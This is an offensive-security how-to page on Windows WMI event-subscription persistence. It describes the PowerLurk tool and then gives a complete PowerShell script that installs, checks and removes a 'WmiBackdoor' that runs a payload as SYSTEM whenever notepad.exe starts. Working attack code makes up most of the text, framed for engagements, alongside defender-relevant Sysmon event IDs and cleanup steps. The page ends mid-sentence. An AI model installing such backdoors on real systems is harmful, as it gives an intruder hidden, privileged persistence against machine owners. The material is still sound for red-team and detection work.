Requirements
High integrity or SYSTEM
In order to maintain persistence through WMI, we need three classes:
EventConsumer: An action (e.g. execute a payload: PowerShell, VBScript, a binary, etc.)
EventFilter: A WQL query that defines which event to act on
FilterToConsumerBinding: Links an EventConsumer to an EventFilter; nothing fires until this exists
We can build these WMI classes using PowerLurk.
Demonstration
You can view these classes afterwards using Get-WmiEvent -Name WmiBackdoor. The CommandLineTemplate for the EventConsumer will simply be C:\Windows\dns_x64.exe (the payload to run), and the query for the EventFilter will be SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe' (fire whenever a process named notepad.exe starts). Once the binding is in place, starting notepad.exe causes WMI to launch the payload as SYSTEM.
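The same three objects built by hand with the built-in Set-WmiInstance / Get-WmiObject cmdlets, so it is clear what PowerLurk is doing under the hood. This is an added example, not code from the original page or from the PowerLurk project; it reuses the WmiBackdoor name, the C:\Windows\dns_x64.exe payload path and the notepad.exe query from the demonstration, and the Install-/Get-/Remove-WmiBackdoor function names are the example's own. It must run from a high-integrity or SYSTEM PowerShell, matching the requirement at the top of the page.

```powershell
# Added example: create, verify and remove a WMI event subscription by hand.
# Assumes the names, payload path and query from the demonstration above;
# root\subscription is writable only by administrators, so run elevated.
$Name    = 'WmiBackdoor'
$Payload = 'C:\Windows\dns_x64.exe'
$Query   = "SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'"
$NS      = 'root\subscription'

function Install-WmiBackdoor {
    # 1. __EventFilter: which event to act on. Win32_ProcessStartTrace lives in
    #    root\cimv2, so EventNamespace must point there even though the filter
    #    object itself is stored in root\subscription.
    $filter = Set-WmiInstance -Namespace $NS -Class __EventFilter -Arguments @{
        Name           = $Name
        EventNamespace = 'root\cimv2'
        QueryLanguage  = 'WQL'
        Query          = $Query
    }

    # 2. CommandLineEventConsumer: the action. WMI launches CommandLineTemplate
    #    from WmiPrvSE.exe as SYSTEM; no interactive shell is involved.
    $consumer = Set-WmiInstance -Namespace $NS -Class CommandLineEventConsumer -Arguments @{
        Name                = $Name
        CommandLineTemplate = $Payload
    }

    # 3. __FilterToConsumerBinding: ties filter and consumer together. Until this
    #    instance exists the other two objects are inert.
    Set-WmiInstance -Namespace $NS -Class __FilterToConsumerBinding -Arguments @{
        Filter   = $filter
        Consumer = $consumer
    } | Out-Null
}

function Get-WmiBackdoor {
    # What a defender (or you, checking your work) would enumerate. The binding
    # stores its filter as an object path such as __EventFilter.Name="WmiBackdoor",
    # so match on that substring rather than on a Name property.
    [PSCustomObject]@{
        Filter   = Get-WmiObject -Namespace $NS -Class __EventFilter -Filter "Name='$Name'"
        Consumer = Get-WmiObject -Namespace $NS -Class CommandLineEventConsumer -Filter "Name='$Name'"
        Binding  = Get-WmiObject -Namespace $NS -Class __FilterToConsumerBinding |
                       Where-Object { $_.Filter -like "*Name=`"$Name`"*" }
    }
}

function Remove-WmiBackdoor {
    # Remove the binding first; an orphaned filter or consumer cannot fire but
    # still shows up in enumeration, so clean all three.
    $objs = Get-WmiBackdoor
    $objs.Binding, $objs.Filter, $objs.Consumer |
        Where-Object { $_ } |
        ForEach-Object { $_ | Remove-WmiObject }
}

Install-WmiBackdoor
Get-WmiBackdoor | Format-List
# Start notepad.exe: dns_x64.exe is spawned as a child of WmiPrvSE.exe running as SYSTEM.
# Remove-WmiBackdoor
```

Two things worth knowing before using this on an engagement: the consumer runs with no interactive desktop, so a payload that expects a console or a user token will appear to do nothing, and Sysmon logs the creation of each object as Event ID 19 (WmiEventFilter), 20 (WmiEventConsumer) and 21 (WmiEventConsumerToFilter), so a monitored host records all three steps the moment they are written.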
To remove the backdoor: